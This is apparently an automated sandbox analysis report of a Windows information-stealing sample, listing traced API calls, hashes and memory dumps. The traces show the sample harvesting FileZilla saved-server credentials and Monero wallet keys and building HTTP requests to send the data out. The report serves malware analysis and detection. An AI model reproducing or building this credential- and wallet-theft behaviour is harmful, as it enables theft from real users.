                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0494e18852fcdfe114d7d022cf847175074c69deb3a2e1d6b6c2c47bdca43c71
                        • Instruction ID: a06ad3caa63b6258db8b942683cedf590f92d753b789768b7e31ebcbd503c647
                        • Opcode Fuzzy Hash: 0494e18852fcdfe114d7d022cf847175074c69deb3a2e1d6b6c2c47bdca43c71
                        • Instruction Fuzzy Hash: 406107F3A181109BE308AA2DDC45B7BBBDADFD4330F1B4A2DF694D7784E93458018696
                        Function 00CE58E7 Relevance: .2, Instructions: 189COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4aee4d7dfbddfbfd2bebab65e240bb827e3981b6f3bc7609a09a2a35bcf2907d
                        • Instruction ID: 39ea5589e83272f5da846972d7e849ad9749156c5920fe87b072f62cc8dc608d
                        • Opcode Fuzzy Hash: 4aee4d7dfbddfbfd2bebab65e240bb827e3981b6f3bc7609a09a2a35bcf2907d
                        • Instruction Fuzzy Hash: C15133F3A181004BF30C6A3CED65776B6CADBD4320F2A422DE68587788E87A58054295
                        Function 00C0A899 Relevance: .2, Instructions: 150COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 06c78a14771cca29b1d66eff4df24b5de60c13405fb45118c687200331cc7279
                        • Instruction ID: 269ac346b512b18ea21410c90d2dca803917d7df984dd669e1c4d220e063b5c4
                        • Opcode Fuzzy Hash: 06c78a14771cca29b1d66eff4df24b5de60c13405fb45118c687200331cc7279
                        • Instruction Fuzzy Hash: C741E7B3A085109FE311AE29EC8576BF7D5DF94620F0A853DEAC8D7744FA35980087C6
                        Function 00C14BD5 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eece32154a7ca660fad4f1e0fe0a68c2dd40a773e81d2dba744f3188386ed470
                        • Instruction ID: 3b56493c4e85146bbc6fdf0334be3ed8d4ca13caf8b11ddc04e34a9c113bafed
                        • Opcode Fuzzy Hash: eece32154a7ca660fad4f1e0fe0a68c2dd40a773e81d2dba744f3188386ed470
                        • Instruction Fuzzy Hash: F54158F3E082089BF3442D28EC493BAB696DB90310F1A463DDFC5D7781E93DA8054386
                        Function 00D28866 Relevance: .1, Instructions: 96COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 712ed1e87949afbdb7f862f50fe924a913c5ecbf53263423ff6617075b31a853
                        • Instruction ID: 68ec974b73a6e08368224459d9e3f3441044177b3ad1adbb0e62982fc0e1aa58
                        • Opcode Fuzzy Hash: 712ed1e87949afbdb7f862f50fe924a913c5ecbf53263423ff6617075b31a853
                        • Instruction Fuzzy Hash: 2E2191F3B086004BF348992ADD9577BB6C7DBD4315F2AC43DDB8587AC8DD7888064295
                        Function 009A9750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 009A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009A8E0B
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,009B0DBA,009B0DB7,009B0DB6,009B0DB3), ref: 009A0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 009A0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 009A03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 009A0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009A0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009A0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 009A0571
                        • lstrcat.KERNEL32(?,url: ), ref: 009A0580
                        • lstrcat.KERNEL32(?,00000000), ref: 009A0593
                        • lstrcat.KERNEL32(?,009B1678), ref: 009A05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 009A05B5
                        • lstrcat.KERNEL32(?,009B167C), ref: 009A05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 009A05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 009A05E6
                        • lstrcat.KERNEL32(?,009B1688), ref: 009A05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 009A0604
                        • lstrcat.KERNEL32(?,00000000), ref: 009A0617
                        • lstrcat.KERNEL32(?,009B1698), ref: 009A0626
                        • lstrcat.KERNEL32(?,009B169C), ref: 009A0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009B0DB2), ref: 009A068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 15cfb5034cdf5968d72d0d89241a9b986b41ae8292efa92e58601c67fccc3fbe
                        • Instruction ID: 2f5c8104de95c8604e9725122e43c59d28f8f1c871ab87daafb6e162e0739f29
                        • Opcode Fuzzy Hash: 15cfb5034cdf5968d72d0d89241a9b986b41ae8292efa92e58601c67fccc3fbe
                        • Instruction Fuzzy Hash: DCD11E71D00208ABCB44EBF4DD96EEEB778EF99300F504519F502A7091EF75AA06DBA1
                        Function 00995960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009959F8
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00995A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00995B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015BE220,00000000,?,015B9E58,00000000,?,009B1A1C), ref: 00995E71
                        • lstrlen.KERNEL32(00000000), ref: 00995E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00995E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00995E9A
                        • lstrlen.KERNEL32(00000000), ref: 00995EAF
                        • lstrlen.KERNEL32(00000000), ref: 00995ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00995EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00995F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00995F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00995F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00995FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00995FBD
                        • HttpOpenRequestA.WININET(00000000,015BE3C0,?,015BDB00,00000000,00000000,00400100,00000000), ref: 00995BF8
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00995FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 742ef70b91b240bbd7e091af4a62805a962c3a44cb513769a21dd189f5560eea
                        • Instruction ID: 4bbb6a3f7eb465447a8cbc622a76c278234574140649094e19fec25a144260b1
                        • Opcode Fuzzy Hash: 742ef70b91b240bbd7e091af4a62805a962c3a44cb513769a21dd189f5560eea
                        • Instruction Fuzzy Hash: 3B122D71820118ABCB55EBA4DCA6FEEB378BF95700F504199F10663091EF342E4ACFA5
                        Function 0099CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0099CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0099D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0099D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D208
                        • lstrcat.KERNEL32(?,009B1478), ref: 0099D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D22A
                        • lstrcat.KERNEL32(?,009B147C), ref: 0099D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D24C
                        • lstrcat.KERNEL32(?,009B1480), ref: 0099D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D26E
                        • lstrcat.KERNEL32(?,009B1484), ref: 0099D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D290
                        • lstrcat.KERNEL32(?,009B1488), ref: 0099D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D2B2
                        • lstrcat.KERNEL32(?,009B148C), ref: 0099D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0099D2D4
                        • lstrcat.KERNEL32(?,009B1490), ref: 0099D2E3
                          • Part of subcall function 009AA820: lstrlen.KERNEL32(00994F05,?,?,00994F05,009B0DDE), ref: 009AA82B
                          • Part of subcall function 009AA820: lstrcpy.KERNEL32(009B0DDE,00000000), ref: 009AA885
                        • lstrlen.KERNEL32(?), ref: 0099D32A
                        • lstrlen.KERNEL32(?), ref: 0099D339
                          • Part of subcall function 009AAA70: StrCmpCA.SHLWAPI(015B8AC0,0099A7A7,?,0099A7A7,015B8AC0), ref: 009AAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0099D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: ba1eab4ff148ba1718e31cf767bc26c39243b052ba45ba388b007f3d018f5da3
                        • Instruction ID: f3dc827fea50818000c758d0dedd91b39356057f8c282d8d9609c510440c7a22
                        • Opcode Fuzzy Hash: ba1eab4ff148ba1718e31cf767bc26c39243b052ba45ba388b007f3d018f5da3
                        • Instruction Fuzzy Hash: C0E15171910108ABCB44EBA4DDA6FEEB379BF95300F104159F107A70A1EF35AE05CBA6
                        Function 0099C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
